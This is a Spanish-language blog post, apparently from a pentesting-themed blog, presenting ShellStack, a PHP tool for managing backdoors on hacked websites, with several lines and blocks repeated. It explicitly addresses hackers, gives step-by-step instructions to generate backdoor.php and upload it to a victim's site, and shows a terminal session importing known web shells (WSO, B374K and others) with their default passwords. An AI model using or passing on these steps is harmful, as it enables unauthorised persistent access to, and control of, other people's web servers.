Auditando Aplicacion Web
Penetration Testing Realizando una auditoria de Seguridad a tu Sistema Operativo, por ><Mitnick Security ><
Herramienta
ShellStack - Una herramienta en PHP para administrar todos tus sitios
ShellStack es una herramienta de gestión de puertas traseras basada en PHP. Esta herramienta es útil para “HACKERS” que desean mantener una pista de cada sitio web hackeados. La herramienta genera un archivo backdoor que sólo se tiene que subir al sitio y poner la URL de backdoor en el shells.txt presente en el directorio de la herramienta.
Con ShellStack puedes
Importar shells de PHP
Obtener los detalles del servidor
Subir archivos desde su sistema usando su terminal
Y sobre todo puedes manejar tus puertas traseras de manera eficiente.
Obtener los detalles del servidor
Subir archivos desde su sistema usando su terminal
Y sobre todo puedes manejar tus puertas traseras de manera eficiente.
Modo de uso
Git clone https://github.com/Tuhinshubhra/shellstack
Cd shellstack
Php shellstack.php
Generatebd y salir del uso de la herramienta CTRL + C – Esto generará un archivo backdoor en el mismo directorio que de la herramienta en un archivo llamado backdoor.php
Subir el archivo Backdoor al sitio web de la víctima
Copia la URL de puerta trasera y pégala en el archivo shells.txt presente en el directorio de la herramienta y guárdela (cada puerta trasera está separada por una nueva línea)
Cd shellstack
Php shellstack.php
Generatebd y salir del uso de la herramienta CTRL + C – Esto generará un archivo backdoor en el mismo directorio que de la herramienta en un archivo llamado backdoor.php
Subir el archivo Backdoor al sitio web de la víctima
Copia la URL de puerta trasera y pégala en el archivo shells.txt presente en el directorio de la herramienta y guárdela (cada puerta trasera está separada por una nueva línea)
Video
Requerimientos:
php
curl
curl
Ejemplo:
Código: Text
user@computer:$ /home/redhaxor/Desktop/shellstack# php shellstack.php
________________________________________________________________________________
_______ _ _ _______ _______ _______ _______ _______ _ _
|______ |_____| |______ | | |______ | |_____| | |____/
______| | | |______ |_____ |_____ ______| | | | |_____ | \_
________________________________________________________________________________
Simple Backdoor Management System
Coded By R3D#@x0R_2H1N A.K.A Tuhinshubhra
Shout Out: LulZSec India
================================================================================
Coded By R3D#@x0R_2H1N A.K.A Tuhinshubhra
Shout Out: LulZSec India
================================================================================
List Of Backdoors:
0. http://localhost/backdoor.php
=============================================
=============================================
[#] Enter Either Of These (Backdoor No.|help|generatebd) : 0
[+] Shell Selected: http://localhost/backdoor.php
[+] Validating Backdoor: Backdoor Found!
[+] Validating Backdoor: Backdoor Found!
List Of Actions
================
[1] Import PHP Shells
[2] Server Details
[3] Remove Backdoor
[4] Remote File Upload
[5] Exit
================
[1] Import PHP Shells
[2] Server Details
[3] Remove Backdoor
[4] Remote File Upload
[5] Exit
[#] Select Option(1|2|3|4|5):2
[+] Server Info
[i] Sending Request And Getting Response...
[i] Server: Linux R3D_MACH1N3 4.9.0-kali4-amd64 #1 SMP Debian 4.9.30-1kali1 (2017-06-06) x86_64
[i] Server IP: 127.0.0.1
[i] Sending Request And Getting Response...
[i] Server: Linux R3D_MACH1N3 4.9.0-kali4-amd64 #1 SMP Debian 4.9.30-1kali1 (2017-06-06) x86_64
[i] Server IP: 127.0.0.1
Press Enter To Continue
List Of Actions
================
[1] Import PHP Shells
[2] Server Details
[3] Remove Backdoor
[4] Remote File Upload
[5] Exit
[#] Select Option(1|2|3|4|5):1
List Of Shells
===============
[1] Dhanush shell {User & Pass : shellstack123}
[2] B374K shell {Pass : shellstack123}
[3] Kurama shell V.1.0 {Pass : red}
[4] WSO shell {Pass : shellstack123}
[5] MiNi shell {User & Pass : shellstack123}
[#] Select Shell To Import(1-5):1
[i] Importing Shell...
[i] Sending Request And Getting Response...
[R] Dhanush Shell Imported Successfully To /var/www/html/dhanush.php
Press Enter To Continue
List Of Actions
================
[1] Import PHP Shells
[2] Server Details
[3] Remove Backdoor
[4] Remote File Upload
[5] Exit
[#] Select Option(1|2|3|4|5):5
root@R3D_MACH1N3:/home/redhaxor/Desktop/shellstack#
root@R3D_MACH1N3:/home/redhaxor/Desktop/shellstack#
Descarga:
No hay comentarios:
Publicar un comentario